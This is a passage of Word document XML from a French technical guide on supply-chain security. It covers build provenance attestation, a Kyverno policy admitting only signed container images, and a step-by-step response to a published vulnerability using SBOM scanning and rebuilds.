          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une provenance vérifiable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Attestation de provenance SLSA niveau 3 (GitHub Actions)</w:t>
        <w:br/>
        <w:t>- name: Générer la provenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">  uses: actions/attest-build-provenance@v2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    subject-name: ghcr.io/org/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    subject-digest: sha256:${{ steps.build.outputs.digest }}</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification côté déploiement</w:t>
        <w:br/>
        <w:t>gh attestation verify oci://ghcr.io/org/app@sha256:abc123 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --repo org/app --signer-workflow org/app/.github/workflows/livraison.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.356 — Quatre niveaux de garantie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83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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Difficulté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artefact produit par une identité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Décrit le processus de construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construction isolée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Runner éphémère, pas d'accès aux secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Reproductibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Même source, même binaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Élevée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ÉPINGLEZ PAR EMPREINTE, PAS PAR ÉTIQUETTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une politique d'admission qui vérifie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>app:1.4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> peut être trompée par une étiquette redéployée. Vérifiez l'empreinte signée, puis déployez cette empreinte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>90.4 Appliquer une politique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une politique d'admission refuse ce qui ne respecte pas les règles : image non signée, registre inconnu, conteneur privilégié, absence de limites de ressources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une politique stricte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Politique Kyverno : images signées uniquement</w:t>
        <w:br/>
        <w:t>apiVersion: kyverno.io/v1</w:t>
        <w:br/>
        <w:t>kind: ClusterPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: images-signees</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  validationFailureAction: Enforce</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: verifier-signature</w:t>
        <w:br/>
        <w:t xml:space="preserve">      match:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        any:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              kinds: [Pod]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      verifyImages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - imageReferences: ["registry.exemple.fr/*"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">          attestors:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - entries:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                - keys:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    publicKeys: |-</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      -----BEGIN PUBLIC KEY-----</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      -----END PUBLIC KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une vérification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Test de la politique : une image non signée doit être refusée</w:t>
        <w:br/>
        <w:t>kubectl run test --image=registry.exemple.fr/app:non-signee -n production</w:t>
        <w:br/>
        <w:t># Error from server: admission webhook "mutate.kyverno.svc" denied the request</w:t>
        <w:br/>
        <w:br/>
        <w:t># Une image signée doit passer</w:t>
        <w:br/>
        <w:t>kubectl run test --image=registry.exemple.fr/app:1.4.2 -n production</w:t>
        <w:br/>
        <w:t># pod/test created</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.357 — Quatre règles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9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Règle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Refuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Mode de déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signature obligatoire</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Images non signées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enforce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Registre autorisé</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Images publiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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Enforce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas de privilège</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>privileged: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enforce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Limites obligatoires</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Pods sans requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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Audit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> puis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enforce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COMMENCEZ EN MODE AUDIT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une politique en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Enforce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dès le premier jour bloque des déploiements légitimes et pousse les équipes à contourner. Passez en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, corrigez, puis basculez règle par règle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>90.5 Réagir à une vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une faille critique est publiée dans une bibliothèque très répandue. La question n'est pas « faut-il corriger ? » mais « où est-elle, et depuis quand ? »</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Localiser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : interroger les SBOM archivés, pas les dépôts.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Qualifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : la fonction vulnérable est-elle réellement appelée ?</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Corriger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : reconstruire avec une version corrigée, republier, redéployer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vérifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : analyse après reconstruction, signature et provenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Consigner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : versions concernées, fenêtre d'exposition, décision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre étapes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1. Localiser</w:t>
        <w:br/>
        <w:t>grype sbom:app-1.4.2.sbom.json | grep -i "CVE-2026-12345"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Corriger la dépendance</w:t>
        <w:br/>
        <w:t>npm audit fix --package-lock-only</w:t>
        <w:br/>
        <w:t>npm ci &amp;&amp; npm test</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3. Republier avec une nouvelle version</w:t>
        <w:br/>
        <w:t>docker build -t registry.exemple.fr/app:1.4.3 .</w:t>
        <w:br/>
        <w:t>trivy image --exit-code 1 --severity CRITICAL registry.exemple.fr/app:1.4.3</w:t>
        <w:br/>
        <w:br/>
        <w:t># 4. Consigner la fenêtre d'exposition</w:t>
        <w:br/>
        <w:t># version 1.4.0 → 1.4.2, déployée du 2026-09-02 au 2026-10-19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.358 — Quatre décisions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9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Décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corriger immédiatement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonction vulnérable exposée</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Correctif sous 24 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Planifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Dépendance transitive non atteignable</w:t>
            </w:r>
          </w:p>
        </w:tc>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Prochaine version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accepter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Composant non chargé à l'exécution</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Documenter et réévaluer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Retirer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Composant inutile</w:t>
            </w:r>
          </w:p>
